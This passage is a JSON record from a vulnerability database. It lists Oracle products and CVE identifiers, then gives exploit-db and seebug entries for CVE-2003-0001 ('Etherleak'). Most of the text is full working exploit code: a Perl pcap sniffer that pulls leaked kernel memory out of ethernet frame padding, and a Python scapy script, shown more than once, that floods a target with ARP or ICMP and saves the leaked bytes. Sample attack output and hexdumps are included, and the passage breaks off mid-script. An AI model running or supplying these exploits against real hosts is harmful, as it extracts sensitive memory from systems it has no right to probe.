"eq"}, {"name": "VirtualBox", "version": "4.3", "operator": "eq"}, {"name": "Oracle Directory Server", "version": "7.0", "operator": "eq"}, {"name": "MySQL Server", "version": "5.5", "operator": "eq"}, {"name": "Oracle Access Manager", "version": "11.1", "operator": "eq"}, {"name": "Fusion Middleware", "version": "10.1", "operator": "eq"}, {"name": "Solaris", "version": "11", "operator": "eq"}, {"name": "Oracle", "version": "11.1", "operator": "eq"}, {"name": "BI Publisher", "version": "11.1", "operator": "eq"}, {"name": "Fusion Middleware", "version": "12.1", "operator": "eq"}, {"name": "Solaris", "version": "10", "operator": "eq"}, {"name": "Oracle HTTP Server", "version": "11.1", "operator": "eq"}, {"name": "Oracle HTTP Server", "version": "12.1", "operator": "eq"}, {"name": "Fusion Applications", "version": "11.1", "operator": "eq"}, {"name": "Agile PLM", "version": "9.3", "operator": "eq"}, {"name": "JD Edwards EnterpriseOne Tool", "version": "9.1", "operator": "eq"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "eq"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "eq"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.1", "operator": "eq"}, {"name": "JRockit", "version": "28.3", "operator": "eq"}, {"name": "GlassFish Server", "version": "3.0", "operator": "eq"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "eq"}, {"name": "Oracle iLearning", "version": "6.1", "operator": "eq"}, {"name": "Communications Messaging Server", "version": "7.0", "operator": "eq"}], "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", "CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-6599", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2014-0114", "CVE-2015-0364", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", "CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "modified": "2015-01-25T00:00:00", "id": "SECURITYVULNS:VULN:14233", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14233", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:45:53", "osvdbidlist": [], "references": [], "description": "Ethernet Device Drivers Frame Padding Info Leakage Exploit (Etherleak). CVE-2003-0001. Remote exploits for multiple platform", "edition": 1, "reporter": "Jon Hart", "published": "2007-03-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Ethernet Device Drivers Frame Padding - Info Leakage Exploit Etherleak", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "modified": "2007-03-23T00:00:00", "id": "EDB-ID:3555", "href": "https://www.exploit-db.com/exploits/3555/", "sourceData": "#!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die \"Unknown option: $!\\n\" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_offline failed: $err\\n\");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR \"lookupdev() failed: $err\\n\");\r\n exit(1);\r\n } else {\r\n print(STDERR \"No interface specified. Using $iface\\n\");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_live failed on $iface: $err\\n\");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : \"\", 0, 0) == -1) {\r\n printf(\"Net::Pcap::compile failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf(\"Net::Pcap::setfilter failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf(\"Net::Pcap::dump_open failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, \"foo\");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf(\"Skipping datalink $datalink\\n\"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf(\"Skipping datalink $datalink l2 type %s\\n\", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = \"\";\r\n my $trailer_ascii = \"\";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf(\"%02x\", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= \".\"; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print(\"#\"x80, \"\\n\");\r\n printf(\"%s -> %s\\n\", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf(\"%s -> %s\\n\", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print(\"$trailer_hex\\t$trailer_ascii\\n\");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3555/"}, {"lastseen": "2016-02-03T02:48:02", "osvdbidlist": ["3873"], "references": [], "description": "Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak. CVE-2003-0001. Dos exploit for hardware platform", "edition": 1, "reporter": "prdelka", "published": "2013-06-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "modified": "2013-06-10T00:00:00", "id": "EDB-ID:26076", "href": "https://www.exploit-db.com/exploits/26076/", "sourceData": "#!/usr/bin/env python\r\n# CVE-2003-0001 'Etherleak' exploit\r\n# =================================\r\n# Exploit for hosts which use a network device driver that pads \r\n# ethernet frames with data which vary from one packet to another, \r\n# likely taken from kernel memory, system memory allocated to \r\n# the device driver, or a hardware buffer on its network interface \r\n# card. Exploit uses scapy with either ICMP or ARP requests as \r\n# this can trigger with either but ICMP can hit layer3 filtering \r\n# rules. Using ARP the padding appears to leak only fixed constant \r\n# values when exploited, ICMP leaks random bytes. \r\n#\r\n# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky\r\n# WARNING: No route found for IPv6 destination :: (no default route?)\r\n# [ CVE-2003-0001 'Etherleak' exploit\r\n# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex\r\n# ............................................................^C!Killing\r\n# !Killing\r\n# root@bt:~/0d# hexdump -C leaky | head\r\n# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..|\r\n# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.|\r\n# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2|\r\n# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p|\r\n# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.|\r\n# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.|\r\n# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|\r\n# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\\gl\"...+.9|\r\n# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\\D.=.|\r\n# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..|\r\n#\r\n# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference\r\n# is CSCua88376 and PSIRT-0669464365.\r\n#\r\n# -- prdelka\r\n#\r\nimport os\r\nimport sys\r\nimport signal\r\nimport binascii\r\nfrom scapy.all import *\r\n\r\ndef signalhandler(signal,id):\r\n\tprint \"!Killing\"\r\n\tsys.exit(0)\r\n\r\ndef spawn(host,type):\r\n\tif type == 'arp':\r\n\t\tsend(ARP(pdst=host),loop=1,nofilter=1)\r\n\telif type == 'icmp':\r\n\t\tsend(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)\t\t\r\n\r\nif __name__ == \"__main__\":\r\n\tprint \"[ CVE-2003-0001 'Etherleak' exploit\"\r\n\tsignal.signal(signal.SIGINT,signalhandler)\r\n\tif len(sys.argv) < 4:\r\n\t\tprint \"[ No! Use with <host> <arp|icmp> <file>\"\r\n\t\tsys.exit(1)\r\n\ttype = sys.argv[2]\r\n\tif type == 'arp':\r\n\t\tpass\r\n\telif type == 'icmp':\r\n\t\tpass\r\n\telse:\r\n\t\tprint \"Bad type!\"\r\n\t\tsys.exit(0)\r\n\tpid = os.fork()\r\n\tif(pid):\r\n\t\tprint \"[ Attacking %s for %s padding saved to %s.hex\" % (sys.argv[1],sys.argv[2],sys.argv[3])\r\n\t\tspawn(sys.argv[1],sys.argv[2])\r\n\twhile True:\r\n\t\tif type == 'arp':\r\n\t\t\tmyfilter = \"host %s and arp\" % sys.argv[1]\r\n\t\telif type == 'icmp':\r\n\t\t\tmyfilter = \"host %s and icmp\" % sys.argv[1]\r\n\t\tx = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))\r\n\t\tp = x[0]\r\n\t\tif type == 'arp':\r\n\t\t\tpad = p.getlayer(2)\r\n\t\tif type == 'icmp':\r\n\t\t\tpad = p.getlayer(4)\r\n\t\tleak = str(pad)\r\n\t\thexfull = binascii.b2a_hex(leak)\r\n\t\tfile = \"%s.hex\"%sys.argv[3]\r\n\t\tfdesc = open(file,\"a\")\r\n\t\tfdesc.write(hexfull + \"\\n\")\r\n\t\tfdesc.close()\r\n\t\t# 32 bits leaked here for me.\r\n\t\tif type == 'icmp':\r\n\t\t\tbytes = leak[9:13]\r\n\t\telif type == 'arp':\r\n\t\t\tbytes = leak[10:14]\r\n\t\tfdesc = open(sys.argv[3],\"ab\")\r\n\t\tfdesc.write(bytes)\r\n\t\tfdesc.close()", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/26076/"}, {"lastseen": "2016-02-02T18:02:41", "osvdbidlist": ["3873"], "references": [], "description": "Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure. CVE-2003-0001. Remote exploit for unix platform", "edition": 1, "reporter": "Jon Hart", "published": "2007-03-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "modified": "2007-03-23T00:00:00", "id": "EDB-ID:22131", "href": "https://www.exploit-db.com/exploits/22131/", "sourceData": "source: http://www.securityfocus.com/bid/6535/info\r\n\r\nNetwork device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.\r\n\r\nFrames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.\r\n\r\nCisco has stated that the IOS 12.1 and 12.2 trains are not affected.\r\n\r\nNational Semiconductor Ethernet controller chips are not vulnerable to this issue. \r\n\r\n#!/usr/bin/perl -w\r\n# etherleak, code that has been 5 years coming.\r\n#\r\n# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,\r\n# a vulnerability that would be come known as the 'etherleak' bug. In\r\n# various situations an ethernet frame must be padded to reach a specific\r\n# size or fall on a certain boundary. This task is left up to the driver\r\n# for the ethernet device. The RFCs state that this padding must consist\r\n# of NULLs. The bug is that at the time and still to this day, many device\r\n# drivers do not pad will NULLs, but rather pad with unsanitized portions\r\n# of kernel memory, oftentimes exposing sensitive information to remote\r\n# systems or those savvy enough to coerce their targets to do so.\r\n#\r\n# Proof of this can be found by googling for 'warchild and etherleak', or\r\n# by visiting:\r\n#\r\n# http://lkml.org/lkml/2002/4/27/101\r\n#\r\n# This was ultimately fixed in the Linux kernel, but over time this\r\n# vulnerability reared its head numerous times, but at the core the\r\n# vulnerability was the same as the one I originally published. The most\r\n# public of these was CVE-2003-0001, which was assigned to address an\r\n# official @stake advisory.\r\n#\r\n# This code can be found its most current form at:\r\n# \r\n# http://spoofed.org/files/exploits/etherleak\r\n#\r\n# Jon Hart <jhart@spoofed.org>, March 2007\r\n#\r\n\r\nuse strict;\r\nuse diagnostics;\r\nuse warnings;\r\nuse Getopt::Long;\r\nuse Net::Pcap;\r\nuse NetPacket::Ethernet qw(:ALL);\r\nuse NetPacket::IP qw(:ALL);\r\n\r\nmy %opts = ();\r\nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \r\n\r\nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or\r\n die \"Unknown option: $!\\n\" && &usage();\r\n\r\nif (defined($opts{'help'})) {\r\n &usage();\r\n exit(0);\r\n}\r\n\r\nif (defined($opts{'read'})) {\r\n $pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_offline failed: $err\\n\");\r\n exit 1;\r\n }\r\n} else {\r\n if (defined($opts{'interface'})) {\r\n $iface = $opts{'interface'};\r\n } else {\r\n $iface = Net::Pcap::lookupdev(\\$err);\r\n if (defined($err)) {\r\n print(STDERR \"lookupdev() failed: $err\\n\");\r\n exit(1);\r\n } else {\r\n print(STDERR \"No interface specified. Using $iface\\n\");\r\n }\r\n }\r\n\r\n $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err);\r\n if (!defined($pcap_t)) {\r\n print(\"Net::Pcap::open_live failed on $iface: $err\\n\");\r\n exit 1;\r\n }\r\n}\r\n\r\nmy $filter;\r\nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : \"\", 0, 0) == -1) {\r\n printf(\"Net::Pcap::compile failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) {\r\n printf(\"Net::Pcap::setfilter failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n}\r\n\r\nif (defined($opts{'write'})) {\r\n $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});\r\n if (!defined($pcap_save)) {\r\n printf(\"Net::Pcap::dump_open failed: %s\\n\", Net::Pcap::geterr($pcap_t));\r\n exit(1);\r\n }\r\n}\r\n\r\nNet::Pcap::loop($pcap_t, -1, \\&process, \"foo\");\r\nNet::Pcap::close($pcap_t);\r\n\r\nif (defined($opts{'write'})) {\r\n Net::Pcap::dump_close($pcap_save);\r\n}\r\n\r\n\r\n\r\nsub process {\r\n my ($user, $hdr, $pkt) = @_;\r\n my ($link, $ip);\r\n my $jump = 0;\r\n\r\n my $datalink = Net::Pcap::datalink($pcap_t);\r\n if ($datalink == 1) { $jump += 14; }\r\n elsif ($datalink == 113) { $jump += 16; }\r\n else { printf(\"Skipping datalink $datalink\\n\"); return; }\r\n\r\n my $l2 = NetPacket::Ethernet->decode($pkt);\r\n \r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n $ip = NetPacket::IP->decode(eth_strip($pkt));\r\n $jump += $ip->{len};\r\n } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }\r\n else { \r\n # assume 802.3 ethernet, and just jump ahead the length\r\n for ($l2->{dest_mac}) {\r\n if (/^0180c200/) {\r\n # spanning tree\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n }\r\n elsif (/^01000ccccc/) {\r\n # CDP/VTP/DTP/PAgP/UDLD/PVST, etc\r\n # l2->{type} here will actually be the length. HACK.\r\n $jump += $l2->{type};\r\n } elsif (/^ab0000020000/) {\r\n # DEC-MOP-Remote-Console\r\n return;\r\n } else {\r\n # loopback\r\n if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }\r\n printf(\"Skipping datalink $datalink l2 type %s\\n\", $l2->{type}); return;\r\n }\r\n }\r\n }\r\n\r\n\r\n if ($hdr->{len} > $jump) {\r\n my $trailer_bin = substr($pkt, $jump);\r\n my $trailer_hex = \"\";\r\n my $trailer_ascii = \"\";\r\n foreach (split(//, $trailer_bin)) {\r\n $trailer_hex .= sprintf(\"%02x\", ord($_));\r\n if (ord($_) >= 32 && ord($_) <= 126) {\r\n $trailer_ascii .= $_;\r\n } else { $trailer_ascii .= \".\"; }\r\n }\r\n # ignore all trailers that are just single characters repeated.\r\n # most OS' use 0, F, 5 or a.\r\n unless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) {\r\n unless ($opts{'quiet'}) {\r\n print(\"#\"x80, \"\\n\");\r\n printf(\"%s -> %s\\n\", $l2->{src_mac}, $l2->{dest_mac});\r\n if ($l2->{type} == ETH_TYPE_IP) {\r\n printf(\"%s -> %s\\n\", $ip->{src_ip}, $ip->{dest_ip});\r\n }\r\n }\r\n print(\"$trailer_hex\\t$trailer_ascii\\n\");\r\n if (defined($opts{'write'})) {\r\n Net::Pcap::dump($pcap_save, $hdr, $pkt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nsub usage {\r\n print <<EOF;\r\n$0 -- A demonstration of the infamous 'etherleak' bug.\r\n\r\n CVE-2003-0001, and countless repeats of the same vulnerability.\r\n\r\n Options:\r\n [-h|--help] # this message\r\n [-i|--interface] <interface> # interface to listen on\r\n [-f|--filter] <pcap filter> # apply this filter to the traffic\r\n [-r|--read] <path to pcap> # read from this saved pcap file\r\n [-w|--write] <path to pcap> # write tothis saved pcap file\r\n [-q|--quiet] # be quiet\r\n [-v|--verbose] # be verbose\r\n\r\nEOF\r\n\r\n\r\n}\r\n\r\n# milw0rm.com [2007-03-23]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/22131/"}], "seebug": [{"lastseen": "2017-11-19T15:04:05", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79723", "id": "SSV:79723", "sourceData": "\n #!/usr/bin/env python\r\n# CVE-2003-0001 'Etherleak' exploit\r\n# =================================\r\n# Exploit for hosts which use a network device driver that pads \r\n# ethernet frames with data which vary from one packet to another, \r\n# likely taken from kernel memory, system memory allocated to \r\n# the device driver, or a hardware buffer on its network interface \r\n# card. Exploit uses scapy with either ICMP or ARP requests as \r\n# this can trigger with either but ICMP can hit layer3 filtering \r\n# rules. Using ARP the padding appears to leak only fixed constant \r\n# values when exploited, ICMP leaks random bytes. \r\n#\r\n# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky\r\n# WARNING: No route found for IPv6 destination :: (no default route?)\r\n# [ CVE-2003-0001 'Etherleak' exploit\r\n# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex\r\n# ............................................................^C!Killing\r\n# !Killing\r\n# root@bt:~/0d# hexdump -C leaky | head\r\n# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..|\r\n# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.|\r\n# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2|\r\n# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p|\r\n# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.|\r\n# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.|\r\n# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|\r\n# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\\gl"...+.9|\r\n# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\\D.=.|\r\n# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..|\r\n#\r\n# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference\r\n# is CSCua88376 and PSIRT-0669464365.\r\n#\r\n# -- prdelka\r\n#\r\nimport os\r\nimport sys\r\nimport signal\r\nimport binascii\r\nfrom scapy.all import *\r\n\r\ndef signalhandler(signal,id):\r\n\tprint "!Killing"\r\n\tsys.exit(0)\r\n\r\ndef spawn(host,type):\r\n\tif type == 'arp':\r\n\t\tsend(ARP(pdst=host),loop=1,nofilter=1)\r\n\telif type == 'icmp':\r\n\t\tsend(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)\t\t\r\n\r\nif __name__ == "__main__":\r\n\tprint "[ CVE-2003-0001 'Etherleak' exploit"\r\n\tsignal.signal(signal.SIGINT,signalhandler)\r\n\tif len(sys.argv) < 4:\r\n\t\tprint "[ No! Use with <host> <arp|icmp> <file>"\r\n\t\tsys.exit(1)\r\n\ttype = 